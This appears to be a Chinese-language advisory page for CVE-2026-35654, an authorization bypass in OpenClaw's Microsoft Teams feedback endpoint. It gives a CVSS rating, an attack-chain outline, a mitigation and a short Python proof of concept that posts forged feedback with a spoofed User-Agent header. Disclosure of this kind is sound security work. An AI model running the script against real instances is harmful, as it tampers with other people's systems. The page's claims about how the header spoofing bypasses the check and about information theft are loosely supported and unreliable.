IPBUF安全漏洞报告
English
CVE-2026-35654 CVSS 5.3 中危

CVE-2026-35654 OpenClaw Teams反馈调用授权绕过漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-35654
漏洞类型
授权绕过
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

授权绕过OpenClawMicrosoft TeamsCWE-862

漏洞概述

OpenClaw在2026.3.25之前的版本中存在授权绕过漏洞。该漏洞位于Microsoft Teams反馈调用模块,允许未经授权的发送者记录会话反馈。攻击者可利用反馈调用端点绕过发送者白名单检查,触发未授权的反馈记录或反射,造成数据完整性风险。

技术细节

该漏洞源于OpenClaw在处理Microsoft Teams反馈调用时的身份验证逻辑缺陷。在受影响版本中,服务端未对feedback invoke端点的请求来源进行严格的白名单验证,导致验证机制失效。攻击者无需经过身份认证(PR:N),即可通过网络向受影响端点发送特制数据包。由于缺乏有效的访问控制,系统错误地将未授权请求视为合法反馈,允许攻击者记录会话反馈或进行数据反射。这破坏了数据的完整性与机密性,使得恶意用户能够伪造反馈数据或窃取敏感信息。

攻击链分析

STEP 1
侦察
攻击者识别出目标OpenClaw实例及其Microsoft Teams feedback invoke端点。
STEP 2
武器化与利用
攻击者构造包含恶意反馈内容的HTTP POST请求,并在请求头中伪造来源信息以绕过白名单检查。
STEP 3
载荷投递
通过网络将特制请求发送至漏洞端点,无需任何用户交互或认证。
STEP 4
影响
系统接受请求并记录未授权的反馈,导致数据完整性受损或信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for the feedback invoke endpoint target_url = "https://target-openclaw-instance/api/teams/feedback/invoke" # Malicious payload to record unauthorized feedback payload = { "feedback": "Unauthorized test feedback", "rating": 5, "sessionId": "victim-session-id" } headers = { # Bypassing whitelist checks by manipulating headers "User-Agent": "MicrosoftTeams/1.0", "Content-Type": "application/json" } # Sending the request response = requests.post(target_url, json=payload, headers=headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}")

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施
如果无法立即升级,建议在网络层面限制对feedback invoke端点的访问,仅允许受信任的IP地址或Microsoft Teams官方服务IP访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表